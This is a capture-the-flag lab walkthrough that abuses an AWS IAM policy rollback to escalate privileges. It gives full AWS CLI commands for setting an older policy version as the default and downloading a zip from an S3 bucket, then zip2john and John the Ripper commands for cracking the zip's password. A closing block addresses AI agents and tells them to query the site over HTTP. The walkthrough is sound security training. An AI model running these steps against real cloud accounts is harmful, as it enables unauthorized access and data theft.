# Escalate Privileges by IAM Policy Rollback

CTF Source: [Pwned Labs](https://pwnedlabs.io/labs/escalate-privileges-by-iam-policy-rollback)

## Overview

In this walkthrough, we're provided access keys for an Intern with seemingly little access, but we find a way to escalate our privileges and obtain access to sensitive data!&#x20;

## Pre-Requisites

* Install awscli: `brew install awscli` (mac) `apt install awscli` (linux)
* Install JohnTheRipper: `brew install john` (mac) `apt intall john` (linux)

## Walkthrough

After configuring our AWS access keys (`⁠aws configure`⁠), let's begin to enumerate our access.

This command tells us who we are.

```
aws sts get-caller-identity

{
    "UserId": "AIDA4C7XGDAETYJA6EVGF",
    "Account": "831057696777",
    "Arn": "arn:aws:iam::831057696777:user/intern01"
}
```

We can then list policies attached to this user.

```
aws iam list-attached-user-policies --user-name intern01  
                       
{
    "AttachedPolicies": [
        {
            "PolicyName": "intern_policy",
            "PolicyArn": "arn:aws:iam::214768663777:policy/intern_policy"
        }
    ]
}
```

Let's see if we have multiple versions of this policy.

```
aws iam list-policy-versions --policy-arn arn:aws:iam::214768663777:policy/intern_policy

{
    "Versions": [
        {
            "VersionId": "v2",
            "IsDefaultVersion": true,
            "CreateDate": "2024-03-14T23:00:42+00:00"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": false,
            "CreateDate": "2024-03-14T23:00:41+00:00"
        }
    ]
}
```

We can view both policies like so: `aws iam get-policy-version --policy-arn arn:aws:iam::214768663777:policy/intern_policy --version-id v1` (or `v2`).

```bash
aws iam get-policy-version --policy-arn arn:aws:iam::831057696777:policy/intern_policy --version-id v1

{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "ec2:DescribeInstances",
                        "s3:ListAllMyBuckets",
                        "s3:GetObject",
                        "s3:ListBucket"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2024-03-14T21:43:51+00:00"
    }
}
```

### Escalating Privileges

The `v1` policy gives us some additional S3 permissions over all resources. We'll set this version as our policy.&#x20;

{% code overflow="wrap" %}

```bash
aws iam set-default-policy-version --policy-arn 
arn:aws:iam::831057696777:policy/intern_policy --version-id v1
```

{% endcode %}

If we list the buckets in the account, we'll find one and download the data.

{% code overflow="wrap" %}

```bash
aws s3 ls    
                                                                           
2024-03-14 15:43:52 huge-logistics-data-8344bf3ad538
```

{% endcode %}

{% code overflow="wrap" %}

```bash
aws s3 cp s3://huge-logistics-data-8344bf3ad538/amex-export.zip .

download: s3://huge-logistics-data-8344bf3ad538/amex-export.zip to ./amex-export.zip
```

{% endcode %}

### Password Cracking

Unfortunately, the file is password-protected.&#x20;

{% code overflow="wrap" %}

```bash
unzip amex-export.zip 

Archive:  amex-export.zip
[amex-export.zip] amex-export.json password:   
```

{% endcode %}

Not to worry as we can attempt to crack the password.&#x20;

We'll create a hash and save it to a new file.&#x20;

{% code overflow="wrap" %}

```bash
zip2john amex-export.zip > hash.txt
```

{% endcode %}

Next, we'll use JohnTheRipper and the classic rockyou.txt password list.&#x20;

{% code overflow="wrap" %}

```bash
john hash.txt --wordlist=rockyou.txt

1logistics       (amex-export.zip)  
```

{% endcode %}

### Finding the Flag!

We found the password! Attempting to unzip the file with this password results in discovering the flag!

{% code overflow="wrap" %}

```bash
unzip -P 1logistics amex-export.zip 

Archive:  amex-export.zip
  inflating: amex-export.json        
 extracting: flag.txt  
```

{% endcode %}

Get the final flag.

{% code overflow="wrap" %}

```bash
cat flag.txt      
  
<flagHash>
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.techwithtyler.dev/cloud-security/capture-the-flags-ctfs/pwnedlabs/escalate-privileges-by-iam-policy-rollback.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.